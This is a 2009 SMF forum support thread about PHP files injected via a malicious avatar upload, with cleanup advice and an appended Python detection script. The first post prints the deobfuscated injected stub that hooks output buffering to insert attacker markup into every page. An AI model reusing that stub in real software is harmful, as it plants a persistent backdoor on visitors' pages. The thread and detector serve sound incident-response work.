
Author Topic: Hacked, script injection  (Read 216329 times)

Offline vHawkeyev

  • Semi-Newbie
  • *
  • Posts: 32
Hacked, script injection
« on: May 01, 2009, 10:47:02 AM »
All the php files on my site have been injected with Base64-encoded text that translates to

Code:
// Guard: run only once per request, and only if output buffering is available
if (function_exists('ob_start') && !isset($GLOBALS['sh_no'])) {
    $GLOBALS['sh_no'] = 1;
    // The dropped style.css.php is the real payload; it defines gml(), which returns the markup to inject
    if (file_exists('/home/jlgam4/public_html/mystiquestudios/forum/Themes/default/images/bbc/style.css.php')) {
        include_once('/home/jlgam4/public_html/mystiquestudios/forum/Themes/default/images/bbc/style.css.php');
        if (function_exists('gml') && !function_exists('dgobh')) {
            // Polyfill gzdecode() for PHP builds that lack it, so gzip-compressed pages can still be rewritten
            if (!function_exists('gzdecode')) {
                function gzdecode($d) {
                    $f = ord(substr($d, 3, 1));   // gzip FLG byte
                    $h = 10;                       // minimum gzip header length
                    $e = 0;
                    if ($f & 4) { $e = unpack('v', substr($d, 10, 2)); $e = $e[1]; $h += 2 + $e; }  // FEXTRA
                    if ($f & 8) { $h = strpos($d, chr(0), $h) + 1; }   // FNAME
                    if ($f & 16) { $h = strpos($d, chr(0), $h) + 1; }  // FCOMMENT
                    if ($f & 2) { $h += 2; }                           // FHCRC
                    $u = gzinflate(substr($d, $h));
                    if ($u === FALSE) { $u = $d; }
                    return $u;
                }
            }
            // Output-buffer callback: decompress the finished page and splice gml() in right after <body>
            // (or in front of the whole page if there is no <body> tag)
            function dgobh($b) {
                Header('Content-Encoding: none');
                $c = gzdecode($b);
                if (preg_match('/\<body/si', $c)) {
                    return preg_replace('/(\<body[^\>]*\>)/si', '$1' . gml(), $c);
                } else {
                    return gml() . $c;
                }
            }
            ob_start('dgobh');
        }
    }
}
I had a look at the style.css.php file and it has been encoded multiple times. I finally got it all decoded but I don't know what it all means.

I removed the code from all my pages and deleted the style.css.php, but when I went to change my theme in my profile it came up with this page that showed details about my server and a list of directories, as well as all files that had been reinjected with the code above, and the style.css.php file reappeared. I'm stuck, I don't know what to do.

Plz help.

kat

  • Guest
Re: Hacked, script injection
« Reply #1 on: May 01, 2009, 12:50:54 PM »
If you don't have any mods installed, just upload fresh files from the SMF install package.

DO NOT OVERWRITE Settings.php

If you have mods, though, that will not be such a good idea.

Of course, you could restore a recent backup, if you have one...

Offline Aleksi "Lex" Kilpinen

  • SMF Friend
  • SMF Super Hero
  • *
  • Posts: 15,430
  • Gender: Male
  • The Artist Formerly Known as LexArma
Re: Hacked, script injection
« Reply #2 on: May 01, 2009, 12:54:16 PM »
Quote
All the php files on my site have been injected with Base64-encoded text that translates to
Do you have a recent member called "krisbarteo" ?
If you do, could you answer these couple of questions:

- Did he upload an avatar?
- Do you use the attachment folder for avatars, or some other custom folder?
- What other software than SMF are you running on your server?

Then please delete that user, and his avatar from your forum.
Finnish Support Local Moderator & Support Specialist
My Mods: Facebook and Twitter Sharer

Offline Joey Smith™

  • SMF Friend
  • SMF Hero
  • *
  • Posts: 6,356
  • Gender: Male
Re: Hacked, script injection
« Reply #3 on: May 01, 2009, 01:21:38 PM »
Quote
style.css.php
This is not supposed to be a php file. It's a css file...

Offline bsm

  • Semi-Newbie
  • *
  • Posts: 22
    • DatingDiva Forum
Re: Hacked, script injection
« Reply #4 on: May 01, 2009, 02:57:12 PM »
I have the exact same problem.

My plan is to remove SMF, then re-build my site from backups.

As for "krisbarteo" - I had no such member, (my hacker was: 'Boommurne' ) but I do have an IP address of the culprit: 24.126.184.8

I'll do an admin on the DB and see what (if anything) was uploaded. (Also going to suspend uploads until I've got things cleared up).

What a mess!!!

Offline karlbenson

  • SMF Friend
  • SMF Super Hero
  • *
  • Posts: 15,614
  • Gender: Male
    • @mortonssols on Twitter
    • Criminal Solicitors
Re: Hacked, script injection
« Reply #5 on: May 01, 2009, 03:02:04 PM »
What version of smf are you using? 1.1.8?
What mods are you using?
Are you using any integrations?

Are you using any of these on that server?
- wordpress
- any software with tinymce editor?

Offline bsm

  • Semi-Newbie
  • *
  • Posts: 22
    • DatingDiva Forum
Re: Hacked, script injection
« Reply #6 on: May 01, 2009, 03:08:30 PM »
I'm using 1.1.8, with Ad mod - also TP 0.9.8

Just checked (I have an identical install that I use for testing) avatars - both the same. So, it wasn't an avatar.

There's no other SW on the domain in question.

Offline vHawkeyev

  • Semi-Newbie
  • *
  • Posts: 32
Re: Hacked, script injection
« Reply #7 on: May 01, 2009, 07:25:53 PM »
Yes I do have the member krisbarteo

It doesn't seem as if he has uploaded an avatar, but when I had a look in my attachments folder I found his avatar. I then downloaded it and opened it in notepad and found php code. I use the attachments folder for storing avatars.

I have deleted everything to do with krisbarteo and added his IP to my server blacklist.

Mods Installed:
Updated Registration Agreement
The Rules

Offline Kindred

  • The Mean One
  • Support Specialist
  • SMF Legend
  • *
  • Posts: 50,952
  • Gender: Male
    • Kindred-999 on GitHub
Re: Hacked, script injection
« Reply #8 on: May 01, 2009, 07:28:19 PM »
What version of SMF were you running? 
Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support forums.  Thank you.

Offline vHawkeyev

  • Semi-Newbie
  • *
  • Posts: 32
Re: Hacked, script injection
« Reply #9 on: May 01, 2009, 07:35:50 PM »
1.1.8

Offline bsm

  • Semi-Newbie
  • *
  • Posts: 22
    • DatingDiva Forum
Re: Hacked, script injection
« Reply #10 on: May 02, 2009, 06:52:06 AM »
I'm using 1.1.8 as well.

I'm diving in, replacing all PHP scripts with "clean" ones. Probably take me all day.

Once done, I'll have a clean backup of all my scripts so if this happens again I can just FTP the site back to normal.

"phasers on stun - we're going in"

Offline sprntrcr

  • Semi-Newbie
  • *
  • Posts: 11
Re: Hacked, script injection
« Reply #11 on: May 02, 2009, 06:59:14 AM »
Using 1.1.8

I had the same issue and timestamps showed that it all started minutes after user krisbarteo joined the forum.

I banned him and removed his avatar file. I diffed against a backup and removed the base64 crap from about 50 files. Also check Themes/default/images/bbc. That is where a bunch of advertising for casinos was stashed.

It appears the avatar that was uploaded was an injection script, so I have disabled uploading of avatars until this issue is resolved.

Google "krisbarteo" and see all the SMF forums he is a member of. This is/could get real nasty.

Offline Aleksi "Lex" Kilpinen

  • SMF Friend
  • SMF Super Hero
  • *
  • Posts: 15,430
  • Gender: Male
  • The Artist Formerly Known as LexArma
Re: Hacked, script injection
« Reply #12 on: May 02, 2009, 07:06:13 AM »
What other scripts are you running along SMF?

Offline vHawkeyev

  • Semi-Newbie
  • *
  • Posts: 32
Re: Hacked, script injection
« Reply #13 on: May 02, 2009, 07:31:17 AM »
I managed to get rid of the script injections by deleting krisbarteo's profile and avatar, which had some php code in it that must have been used for the injection. Then I uploaded clean versions of all php files.

But now I'm having troubles with my themes.

Offline bsm

  • Semi-Newbie
  • *
  • Posts: 22
    • DatingDiva Forum
Re: Hacked, script injection
« Reply #14 on: May 04, 2009, 05:53:50 AM »
The script injection will affect ALL your php scripts, including themes.

I'm about halfway through manually removing them all before the big upload.

oy vey... what a mess ! :'(

Offline vHawkeyev

  • Semi-Newbie
  • *
  • Posts: 32
Re: Hacked, script injection
« Reply #15 on: May 04, 2009, 06:34:25 AM »
Quote
I managed to get rid of the script injections by deleting krisbarteo's profile and avatar, which had some php code in it that must have been used for the injection. Then I uploaded clean versions of all php files.

Like you said, it affects all php files, so I replaced every one.

Offline Agent Orange

  • Semi-Newbie
  • *
  • Posts: 31
  • Gender: Male
    • Puffed Unity Fellowship
Re: Hacked, script injection
« Reply #16 on: May 04, 2009, 04:44:33 PM »
I have this same problem. I removed and banned krisbarteo, now I'll have to re-upload new php-files.

Quote
DO NOT OVERWRITE Settings.php

What happens if you do that?

Never mind, I guess I got lucky first time around, as I didn't have a copy of that particular file (and as such, didn't overwrite it).
« Last Edit: May 04, 2009, 05:17:28 PM by Agent Orange »

Offline JBlaze

  • Lead Customizer
  • SMF Super Hero
  • *
  • Posts: 12,114
    • zilladotexe on GitHub
    • jasonclemons1 on LinkedIn
Re: Hacked, script injection
« Reply #17 on: May 04, 2009, 04:47:53 PM »
Quote
I have this same problem. I removed and banned krisbarteo, now I'll have to re-upload new php-files.

DO NOT OVERWRITE Settings.php

I believe I actually did that first time around. What effect did it have on my forum?

Settings.php is what controls the connection between your forum and your database. It contains all the login info needed to connect.

To reset your Settings.php so it can connect back to your forum, use the repair_settings.php tool (What is repair_settings.php?).

Offline H

  • SMF Friend
  • SMF Super Hero
  • *
  • Posts: 21,657
  • Gender: Male
Re: Hacked, script injection
« Reply #18 on: May 04, 2009, 05:03:20 PM »
Some hackers will modify all files. You'll need to check if this code is present in Settings.php and remove it if it is. Otherwise the hack will remain.
-H
Former Support Team Lead

Offline JBlaze

  • Lead Customizer
  • SMF Super Hero
  • *
  • Posts: 12,114
    • zilladotexe on GitHub
    • jasonclemons1 on LinkedIn
Re: Hacked, script injection
« Reply #19 on: May 04, 2009, 05:56:22 PM »
Quote
Some hackers will modify all files. You'll need to check if this code is present in settings.php and remove it if it is. Otherwise the hack will remain

Also, to elaborate on that, there was a recent hack I had to "sanitize" that the hacker had injected extra php files into almost every directory. Make sure that there are no randomly named files and also check your .htaccess for extra code as well.

On another note, check your index.php in the forum root directory as well as index.template.php in your themes directory for unwanted code.

These are all common places for hackers to inject code.
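
The checks described in this thread (sprntrcr's diff against a clean backup, the avatar that turned out to contain PHP, the style.css.php dropped under images/bbc, and the randomly named extra files JBlaze mentions) combined into one triage helper. This is an added example, not code from the thread or from SMF: the signature strings come from the injected code quoted in the first post, while the attachments/ and Themes/default/images/ paths, the 100-character base64 threshold and the sample trees are assumptions constructed for the demo.

```python
import base64, hashlib, re

# Markers from the injected code quoted in the first post, plus the usual eval(base64_decode()) wrapper; paths assume the SMF 1.1 layout.
SIGNATURES = {"sh_no-guard": re.compile(r"\$GLOBALS\['sh_no'\]"),
              "ob_start-dgobh": re.compile(r"ob_start\('dgobh'\)"),
              "eval-base64": re.compile(r"eval\s*\(\s*base64_decode\s*\(")}
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{100,}={0,2}")  # long base64 literals (threshold assumed)
LOADER = re.compile(r"ob_start|gzinflate|eval\s*\(")   # what such literals decode to
PHP_TAG = re.compile(rb"<\?php\b|<\?=")
DATA_DIRS = ("attachments/", "Themes/default/images/")  # must never hold PHP files

def scan_content(rel, data):
    """Indicators found inside one file, independent of any backup."""
    text = data.decode("latin-1")  # never fails; keeps bytes 1:1
    hits = [f"sig:{name}" for name, rx in SIGNATURES.items() if rx.search(text)]
    for blob in B64_BLOB.findall(text):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("latin-1")
        except ValueError:  # binascii.Error is a ValueError
            continue
        if LOADER.search(decoded):
            hits.append("b64-decodes-to-php")
            break
    if not rel.endswith(".php") and PHP_TAG.search(data):
        hits.append("php-tag-in-non-php-file")  # e.g. the avatar that carried the code
    if rel.endswith(".php") and rel.startswith(DATA_DIRS):
        hits.append("php-file-in-data-dir")  # e.g. images/bbc/style.css.php
    return hits

def triage(live, clean):
    """Diff a live tree against a clean copy; both are {relative path: bytes}."""
    clean_hash = {rel: hashlib.sha256(b).hexdigest() for rel, b in clean.items()}
    report = {}
    for rel, data in live.items():
        hits = scan_content(rel, data)
        if rel not in clean_hash:
            hits.insert(0, "added")  # randomly named extra files, dropped scripts
        elif hashlib.sha256(data).hexdigest() != clean_hash[rel]:
            hits.insert(0, "modified")  # the stub prepended to every script
        if hits:
            report[rel] = hits
    return report

# Constructed sample trees reproducing the thread's symptoms (not real site data).
PAYLOAD = b"if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;ob_start('dgobh');}"
CLEAN = {"index.php": b"<?php\nrequire_once('SSI.php');\n", "Themes/default/style.css": b"body{margin:0}\n"}
LIVE = {**CLEAN,
        "index.php": b"<?php eval(base64_decode('" + base64.b64encode(PAYLOAD) + b"'));\nrequire_once('SSI.php');\n",
        "attachments/1_a1b2c3": b"GIF89a<?php /* avatar carrying code */ ?>",
        "Themes/default/images/bbc/style.css.php": b"<?php function gml(){return '';}\n"}
```

On a real site, build the two dictionaries by walking the live web root and an unpacked clean SMF 1.1.8 package into {relative path: bytes}, then treat every path reported as modified or added as a file to replace or remove (Settings.php included, after checking it for the stub by hand).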